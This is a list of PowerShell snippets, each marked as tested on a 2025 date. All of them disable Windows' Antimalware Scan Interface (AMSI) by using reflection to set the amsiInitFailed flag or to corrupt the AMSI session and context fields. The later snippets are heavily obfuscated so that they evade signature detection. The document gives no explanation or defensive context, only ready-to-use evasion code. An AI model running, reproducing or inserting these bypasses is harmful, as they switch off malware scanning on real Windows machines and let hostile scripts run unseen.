============================
Tested - August 03, 2025
============================
# AMSI Init flag bypass
$u = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")
$f = $u.GetField("amsiInitFailed", "NonPublic,Static")
$f.SetValue($null, $true)
============================

============================
Tested - August 03, 2025
============================
$amsi = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils")
$field = $amsi.GetField("amsiInitFailed", 'NonPublic,Static')
$field.SetValue($null, $true)
============================

============================
Tested - August 03, 2025
============================
sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
============================


============================
Tested - September 04, 2025
============================
$DWLCE4YIIZn4e2qA=$null;$Xsh6her7SN=[System.Runtime.InteropServices.Marshal]::AllocHGlobal((9076));$luzvwththyw="+[CHaR](105+27-27)+[chAr]([BYTe]0x6b)+[chAr](109)+[chAR](104)+[cHAR](32+72)+[chAR](106)+[cHaR]([byTE]0x64)";[Threading.Thread]::Sleep(797);[Ref].Assembly.GetType("System.$(('Mánâgêm'+'ént').nOrMAlIZe([CHAR](70+66-66)+[cHAr](111+95-95)+[char](114*96/96)+[cHAr]([bYTe]0x6d)+[ChAR](68*29/29)) -replace [CHAR]([ByTe]0x5c)+[ChAR](112)+[CHAr]([bYTE]0x7b)+[cHAr]([byte]0x4d)+[Char]([BYte]0x6e)+[CHAR](125)).$(('À'+'ù'+'t'+'ó'+'m'+'ä'+'t'+'î'+'õ'+'n').nORMAlIzE([chAR](70*60/60)+[ChAR](111+32-32)+[chAR](114*9/9)+[cHAr]([BytE]0x6d)+[cHar]([bytE]0x44)) -replace [CHaR]([bytE]0x5c)+[cHAr]([ByTe]0x70)+[CHAR]([BYTe]0x7b)+[chAr](77*23/23)+[Char](110)+[chAr]([BYTe]0x7d)).$([Char](65+8-8)+[Char](109+45-45)+[ChAR]([bytE]0x73)+[CHAR]([bYtE]0x69)+[cHAR](85)+[cHAR]([BYTe]0x74)+[ChAR]([BYtE]0x69)+[CHar]([BYtE]0x6c)+[CHaR](115*9/9))").GetField("$(('ãmsî'+'Sèss'+'ìôn').NormALIzE([cHAR](70+48-48)+[ChAR]([byTe]0x6f)+[cHAR](114)+[chaR]([byTe]0x6d)+[CHar]([ByTE]0x44)) -replace [CHAr](92+30-30)+[CHAR](112+53-53)+[cHar]([BYTE]0x7b)+[ChaR](77)+[cHAr]([byte]0x6e)+[chaR](125*95/95))", "NonPublic,Static").SetValue($DWLCE4YIIZn4e2qA, $DWLCE4YIIZn4e2qA);[Ref].Assembly.GetType("System.$(('Mánâgêm'+'ént').nOrMAlIZe([CHAR](70+66-66)+[cHAr](111+95-95)+[char](114*96/96)+[cHAr]([bYTe]0x6d)+[ChAR](68*29/29)) -replace [CHAR]([ByTe]0x5c)+[ChAR](112)+[CHAr]([bYTE]0x7b)+[cHAr]([byte]0x4d)+[Char]([BYte]0x6e)+[CHAR](125)).$(('À'+'ù'+'t'+'ó'+'m'+'ä'+'t'+'î'+'õ'+'n').nORMAlIzE([chAR](70*60/60)+[ChAR](111+32-32)+[chAR](114*9/9)+[cHAr]([BytE]0x6d)+[cHar]([bytE]0x44)) -replace [CHaR]([bytE]0x5c)+[cHAr]([ByTe]0x70)+[CHAR]([BYTe]0x7b)+[chAr](77*23/23)+[Char](110)+[chAr]([BYTe]0x7d)).$([Char](65+8-8)+[Char](109+45-45)+[ChAR]([bytE]0x73)+[CHAR]([bYtE]0x69)+[cHAR](85)+[cHAR]([BYTe]0x74)+[ChAR]([BYtE]0x69)+[CHar]([BYtE]0x6c)+[CHaR](115*9/9))").GetField("$([cHaR](97)+[chAR](109*76/76)+[cHar]([bYTe]0x73)+[chAr]([bYTe]0x69)+[ChaR]([BYTe]0x43)+[char](111)+[cHAr](110)+[cHaR](103+13)+[cHAR]([ByTE]0x65)+[ChaR](120)+[cHar]([byTe]0x74))", "NonPublic,Static").SetValue($DWLCE4YIIZn4e2qA, [IntPtr]$Xsh6her7SN);$ferxvrjrnipve="+[chAR](115+77-77)+[Char]([byte]0x6e)+[CHaR]([bYTE]0x62)+[cHar](103*67/67)+[ChAR]([Byte]0x76)+[chAr](101*62/62)+[cHar]([bYTe]0x71)+[ChaR]([byTE]0x63)+[cHAR]([byTe]0x64)+[ChaR](101)+[cHAr]([BytE]0x69)+[chaR](98+87-87)+[ChAr]([BYTE]0x75)+[ChAr](116+99-99)+[CHar](113*45/45)+[cHar]([bYTe]0x79)+[cHar]([byte]0x64)+[chaR](110+76-76)+[cHar]([BYte]0x63)+[CHaR]([BYTE]0x71)+[Char](108*41/41)+[CHAR](35+70)";[Threading.Thread]::Sleep(1511)
